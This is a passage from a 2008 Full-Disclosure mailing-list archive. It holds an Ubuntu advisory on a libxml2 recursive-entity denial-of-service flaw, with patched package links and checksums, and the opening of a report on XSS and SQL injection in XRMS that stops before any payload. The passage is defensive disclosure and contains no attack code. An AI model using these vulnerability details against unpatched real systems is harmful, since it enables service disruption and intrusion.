M?t?o du Net - http://grenouille.com OpenPGP Key ID : 9FE9161D Key fingerprint : 9CA4 0249 AF57 A35B 34B3 AC15 FAA0 CB50 9FE9 161D -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/e6610721/attachment.bin From kees at ubuntu.com Thu Sep 4 00:08:39 2008 From: kees at ubuntu.com (Kees Cook) Date: Wed, 3 Sep 2008 16:08:39 -0700 Subject: [Full-disclosure] [USN-640-1] libxml2 vulnerability Message-ID: <20080903230839.GH12962@outflux.net> =========================================================== Ubuntu Security Notice USN-640-1 September 03, 2008 libxml2 vulnerability CVE-2008-3281 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libxml2 2.6.24.dfsg-1ubuntu1.2 Ubuntu 7.04: libxml2 2.6.27.dfsg-1ubuntu3.2 Ubuntu 7.10: libxml2 2.6.30.dfsg-2ubuntu1.2 Ubuntu 8.04 LTS: libxml2 2.6.31.dfsg-2ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Andreas Solberg discovered that libxml2 did not handle recursive entities safely. If an application linked against libxml2 were made to process a specially crafted XML document, a remote attacker could exhaust the system's CPU resources, leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.2.diff.gz Size/MD5: 60191 6a214b689f58040545ff197fe4163255 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.2.dsc Size/MD5: 940 c5fc18917961e09df890c01c325f123d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg.orig.tar.gz Size/MD5: 3293814 461eb1bf7f0c845f7ff7d9b1a4c4eac8 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.24.dfsg-1ubuntu1.2_all.deb Size/MD5: 1252772 d820db218e3f2fee1a6a1318379d6ee7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.24.dfsg-1ubuntu1.2_all.deb Size/MD5: 18988 4ce9dd93fe5ad4ec0547c1f2d24020ee amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 918232 14b5fa19b5a025fb76bedc0c42c74132 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 737156 eab5587f1f6c46ee8efa4c3ae49e3245 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 36692 2220b5e79eebdb14ae8e95ce4743db8c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 752360 9adf37be52a761a6989349e64566c71c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 181658 b4e527c71c64a06573368ca395ec6076 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.2_i386.deb Size/MD5: 765570 eae8c86ee5e0408c44d34752c56f7894 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.2_i386.deb Size/MD5: 641600 500367c779b75de2885e887a6d46d6df http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.2_i386.deb Size/MD5: 32976 14135212c4b907c97b134521acd2fcc7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.2_i386.deb Size/MD5: 684460 d1a1199d59e399b1dd70b601707d4cef http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.2_i386.deb Size/MD5: 166422 25f5289cd6f7a312a94560e30d9aa9a1 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 904190 d1aafd718b903d24c12a8ef8940062fa http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 760864 67a7e5075b1b4b2ed69b805525236903 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 37424 f3a634f8a137b00d93b817e0b5b3c05f http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 733294 bd50c0fed7a540607d7e28ccb5db8e21 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 170820 84353c8e07095ae7dfc0cdadeef4c70e sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 745178 0e88615626fab9d24c45500bb36d7117 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 703220 e3fa546314d80b857c524c8a1ad18ce5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 34306 07189657822d4b4a24f0821a42388904 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 716374 ac7e64beace4d313237373d2cc50d745 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 174780 cf3278be2f270a75e7864d13a35b4856 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.27.dfsg-1ubuntu3.2.diff.gz Size/MD5: 146205 327b7dcc16dd41b735a8abbe84f94241 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.27.dfsg-1ubuntu3.2.dsc Size/MD5: 1109 244fa5269dfbf1fd1af1ebf226fb04ae http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz Size/MD5: 3416175 5ff71b22f6253a6dd9afc1c34778dec3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-1ubuntu3.2_all.deb Size/MD5: 1293138 63f851f149d97e458842857887680b08 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-1ubuntu3.2_amd64.deb Size/MD5: 894700 5f757978b789b2c4d134a1c4c4979d15 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-1ubuntu3.2_amd64.deb Size/MD5: 747622 b48287a92fc3da9bd4a1272ff6d9e72f http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.27.dfsg-1ubuntu3.2_amd64.udeb Size/MD5: 575288 608bb2e2d67635e9d050e398f17ed594 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-1ubuntu3.2_amd64.deb Size/MD5: 37138 2c71a708a1514402c3bd0881af6293ee http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.27.dfsg-1ubuntu3.2_amd64.deb Size/MD5: 809572 ec87d03e38b5bd7ae5788b4d0862ade8 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.27.dfsg-1ubuntu3.2_amd64.deb Size/MD5: 862306 32dd3c4ccb9459c6dab7c40c91230953 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.27.dfsg-1ubuntu3.2_amd64.deb Size/MD5: 292858 76ac76d74921f9b26c13e1b3a217fec1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-1ubuntu3.2_i386.deb Size/MD5: 850664 1e8c355c8380437bd80220a63540519b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-1ubuntu3.2_i386.deb Size/MD5: 672718 1aaca4b39cabec020fd3ae37a0e9e10a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.27.dfsg-1ubuntu3.2_i386.udeb Size/MD5: 527126 4f4c5788ee5f92af4b1deebf54d5ec5e http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-1ubuntu3.2_i386.deb Size/MD5: 34232 3f7580b929b08b1ce51461e8df4ef87b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.27.dfsg-1ubuntu3.2_i386.deb Size/MD5: 761286 8aa414c05ab13b164d0ebe478cf9d250 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.27.dfsg-1ubuntu3.2_i386.deb Size/MD5: 788794 78ebe0956b541cb125028d03d75b9bf0 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.27.dfsg-1ubuntu3.2_i386.deb Size/MD5: 262452 a37121d006462557743f7518059c74d6 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-1ubuntu3.2_powerpc.deb Size/MD5: 895858 9ecdee5e7d792f93795bef204f132256 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-1ubuntu3.2_powerpc.deb Size/MD5: 774336 3b760fda601d50785eb78683dad9635e http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.27.dfsg-1ubuntu3.2_powerpc.udeb Size/MD5: 559728 cbb92482b752b00d1df0459d26d07c2b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-1ubuntu3.2_powerpc.deb Size/MD5: 42338 c813dfd770ca3d103a4929f144564832 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.27.dfsg-1ubuntu3.2_powerpc.deb Size/MD5: 794508 0dbda1b2c17461e2a160458b10fe2394 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.27.dfsg-1ubuntu3.2_powerpc.deb Size/MD5: 856114 eafc1a3a6e92b8dadfef317905a5c81a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.27.dfsg-1ubuntu3.2_powerpc.deb Size/MD5: 286514 be5355b5a55df77bc5b380c3a47822de sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-1ubuntu3.2_sparc.deb Size/MD5: 787800 402ccd3b713dfc52d03c4af9bb88afc5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-1ubuntu3.2_sparc.deb Size/MD5: 715350 245c6244696d804f26343e4f42ff4ade http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.27.dfsg-1ubuntu3.2_sparc.udeb Size/MD5: 538886 b73764fd8acc8290a75d4c4eaf48ded0 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-1ubuntu3.2_sparc.deb Size/MD5: 36394 506372bd37985bc6dd0532f79d0bb437 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.27.dfsg-1ubuntu3.2_sparc.deb Size/MD5: 773492 19960be81230e2f53c40140b09a92cc7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.27.dfsg-1ubuntu3.2_sparc.deb Size/MD5: 816310 b89752d772f2ced1eed09ce8e93b9615 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.27.dfsg-1ubuntu3.2_sparc.deb Size/MD5: 278880 205a4f13c6b2ebcd31d9e64524cf4457 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.30.dfsg-2ubuntu1.2.diff.gz Size/MD5: 178818 77dd1f98bf183b11f3f97a134ab0bf39 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.30.dfsg-2ubuntu1.2.dsc Size/MD5: 1109 588e007509ea87254c730c52cb9f5ca4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.30.dfsg.orig.tar.gz Size/MD5: 3433982 fe52a06fd8f104308271eb7093a0b644 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.30.dfsg-2ubuntu1.2_all.deb Size/MD5: 1300148 72a2b0f0f281b7a9eb26dfc86c15d533 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_amd64.deb Size/MD5: 895172 a3765c87a0eed80efed465a9cd7a577d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.30.dfsg-2ubuntu1.2_amd64.deb Size/MD5: 752786 f510e178ab5ca44a088f6a9941feaa88 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.30.dfsg-2ubuntu1.2_amd64.udeb Size/MD5: 578414 585590746e1174feae78b05e48c1c3c2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.30.dfsg-2ubuntu1.2_amd64.deb Size/MD5: 37180 cc74418be746fdf0259f2168aab0be6b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.30.dfsg-2ubuntu1.2_amd64.deb Size/MD5: 818792 022e40c4156cc04890054ebf7ac3b7b1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_amd64.deb Size/MD5: 863906 419ae7d77cf0088942cb200a545c3dd9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.30.dfsg-2ubuntu1.2_amd64.deb Size/MD5: 293814 35832922ab8429c19008c2f2a19b4f6e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_i386.deb Size/MD5: 853970 f2117b1e3a5de1e213a8054f524be7ce http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.30.dfsg-2ubuntu1.2_i386.deb Size/MD5: 675252 9ee0ad03a7d9c203e70bc167f2acc43b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.30.dfsg-2ubuntu1.2_i386.udeb Size/MD5: 529026 64903f5b14c3f24c960e96ab2e71a2f1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.30.dfsg-2ubuntu1.2_i386.deb Size/MD5: 34254 c06a55656107e446ed5b94d85cbae364 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.30.dfsg-2ubuntu1.2_i386.deb Size/MD5: 770118 5cd1d37b516334cb75919f58f4e55c1d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_i386.deb Size/MD5: 792528 66bc6a0f7a64aa540b35ff969207e493 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.30.dfsg-2ubuntu1.2_i386.deb Size/MD5: 263078 863919afaf2c3b8c710e3ee7373fba4b lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_lpia.deb Size/MD5: 929776 b55d7dd7f45f18c7f3afbcf1c703ce9e http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.30.dfsg-2ubuntu1.2_lpia.deb Size/MD5: 679106 8dfd3a8a5762febbdb359fe7226da3b1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.30.dfsg-2ubuntu1.2_lpia.udeb Size/MD5: 529034 7dedfa1e999b52d89c0a5959b6ba43ab http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.30.dfsg-2ubuntu1.2_lpia.deb Size/MD5: 34526 8c45330b6d2af115043911cf69425c80 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.30.dfsg-2ubuntu1.2_lpia.deb Size/MD5: 770232 e3d1ca84b7d9c01fe477813f1e598ba8 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_lpia.deb Size/MD5: 788080 bb8cf4cd7197b8a82fd60ff0081619f5 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.30.dfsg-2ubuntu1.2_lpia.deb Size/MD5: 259678 1c327b8809443d353013fc757edbfc9d powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_powerpc.deb Size/MD5: 896444 5ff597f4020d7325094b89fc8f3c9507 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.30.dfsg-2ubuntu1.2_powerpc.deb Size/MD5: 777268 9feb05e7cb40d7bc3c409dde19fa03f1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.30.dfsg-2ubuntu1.2_powerpc.udeb Size/MD5: 561644 63986fb94f3629d5c82acd2383dd9b29 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.30.dfsg-2ubuntu1.2_powerpc.deb Size/MD5: 42350 b9c1026c57bf661ee98879c7adeb10ab http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.30.dfsg-2ubuntu1.2_powerpc.deb Size/MD5: 802244 0d5e3d4e2f3882349f40d4b8fec0a483 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_powerpc.deb Size/MD5: 857862 0ef43bb8deb0bc1fbc9e4ac84ad0d419 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.30.dfsg-2ubuntu1.2_powerpc.deb Size/MD5: 287272 f98059e171281fe73c65c573cf3e252f sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_sparc.deb Size/MD5: 786910 1cd704514114beef814df88317d7924c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.30.dfsg-2ubuntu1.2_sparc.deb Size/MD5: 718288 07844b3e88ec93af62ab50ba9e99b8a9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.30.dfsg-2ubuntu1.2_sparc.udeb Size/MD5: 541390 c2da24a6c928d2c1a799738b75b9c7ae http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.30.dfsg-2ubuntu1.2_sparc.deb Size/MD5: 36498 866364008170a6824f4d122c9b00a9f1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.30.dfsg-2ubuntu1.2_sparc.deb Size/MD5: 781352 3d6c5d0f50c2df7773f3ca431bc1ccb1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.30.dfsg-2ubuntu1.2_sparc.deb Size/MD5: 815996 0c811fecca83247dfa40e977964d0dc4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.30.dfsg-2ubuntu1.2_sparc.deb Size/MD5: 279510 d16d97e4915d021f259191ba35fc9244 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.1.diff.gz Size/MD5: 64396 01a0b6f8cc4212ea13ff40932b020bc7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.1.dsc Size/MD5: 1110 88ee4eb3f7a214112fd64efe9cf78af2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg.orig.tar.gz Size/MD5: 3442959 8498d4e6f284d2f0a01560f089cb5a3e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.31.dfsg-2ubuntu1.1_all.deb Size/MD5: 1302230 6086b009e176b010ae1845f2445e5dc0 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_amd64.deb Size/MD5: 939106 e7bc5b67fcadb2c77f05b149ff61fbf3 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.1_amd64.deb Size/MD5: 753526 919a1cc44e5c144861fdf25f7db18e98 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.1_amd64.udeb Size/MD5: 580050 413c39297aec531026b9977770e0ae4c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.1_amd64.deb Size/MD5: 37054 83ba40304914ad952035f34aa371fb8d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.1_amd64.deb Size/MD5: 831902 65df7a8169b85121e89e5c63e90079af http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_amd64.deb Size/MD5: 872904 430a7c21fc29f6575bd3ad37591eaec3 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.1_amd64.deb Size/MD5: 297974 1d0e5c41fed847b5abb46cbde2161e1b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_i386.deb Size/MD5: 904844 e4d058cb8c45c75004642ce435a0d001 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.1_i386.deb Size/MD5: 676046 f99a3d75094888d30c7883c60cb2d69e http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.1_i386.udeb Size/MD5: 532798 d0a9588361fd30ff387723849e22c247 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.1_i386.deb Size/MD5: 34050 a6bae002d015bea458f3fcacb4deec99 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.1_i386.deb Size/MD5: 785396 fa2b9dfa062667138ef9eff748132301 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_i386.deb Size/MD5: 796222 095b2733a48adf7959be6c96670e9ba9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.1_i386.deb Size/MD5: 262972 66673fdddbfa8e41acc4020ffe565494 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_lpia.deb Size/MD5: 930530 7bcc05bd11dbf8d90542512ca1caf4dd http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.1_lpia.deb Size/MD5: 679132 f43f12fc4a6404e71dc222e439270b4e http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.1_lpia.udeb Size/MD5: 528668 93961d14f15d935829a55f273f7d9435 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.1_lpia.deb Size/MD5: 34498 ec405a518c482f62cdd5d2edbd3c3bcb http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.1_lpia.deb Size/MD5: 780742 ea05aca1919347860ec2796761c0c17d http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_lpia.deb Size/MD5: 788506 cb3909087b0e915f9e85970b2199e7e8 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.1_lpia.deb Size/MD5: 259634 bad001b19aaa6a3c06d518f8be02273c powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_powerpc.deb Size/MD5: 922482 fbf1caf4e58eb7c2beda992d1f9d28b8 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.1_powerpc.deb Size/MD5: 775678 14ff35624f61779ec8c03c8b54fc7e0f http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.1_powerpc.udeb Size/MD5: 563516 c43b62cc44962f00523fe965f8db0e73 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.1_powerpc.deb Size/MD5: 42062 855016ce88595d7e5e310b91de0baa67 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.1_powerpc.deb Size/MD5: 815508 b5260005ea0b25678f4e96a12a1b6715 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_powerpc.deb Size/MD5: 841262 ef1027246949de19103e2fdea6a4d69e http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.1_powerpc.deb Size/MD5: 285368 15d700fd21c2fb8a9f2e365aa4456817 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_sparc.deb Size/MD5: 824842 f507543302feb3b628f75591f7257ff1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.1_sparc.deb Size/MD5: 719258 a34c62b0caaeb0aa181b3db76d382bcc http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.1_sparc.udeb Size/MD5: 540722 ee04422f1b0d440f4d8513edf1efb09c http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.1_sparc.deb Size/MD5: 36186 a08df0439ab046d7614a73f6a5c05ce7 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.1_sparc.deb Size/MD5: 792522 c50ba8e8379fb6c0e8437c3ae18e8c5d http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.1_sparc.deb Size/MD5: 807752 9ab94dffa20f9bd7a80bf170c76d9061 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.1_sparc.deb Size/MD5: 277516 f498f07cdc37d09fc8f263fcfdc7a327 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 235 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080903/51de75ec/attachment.bin From fabian at datensalat.eu Thu Sep 4 01:04:48 2008 From: fabian at datensalat.eu (Fabian Fingerle) Date: Thu, 4 Sep 2008 02:04:48 +0200 Subject: [Full-disclosure] Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664 Message-ID: <20080904020448.481c122b@mobile.fabian.datensalat.eu> Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664 References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3664 http://xrms.sourceforge.net Description XRMS is a web-based application for managing business entities such as employees, customers, contacts, activities with those contacts, etc. The application is vulnerable to simple Cross Site Scripting, which can be used for several isues Example Assuming XRMS is installed on http://localhost/xrms/, anybody could inject 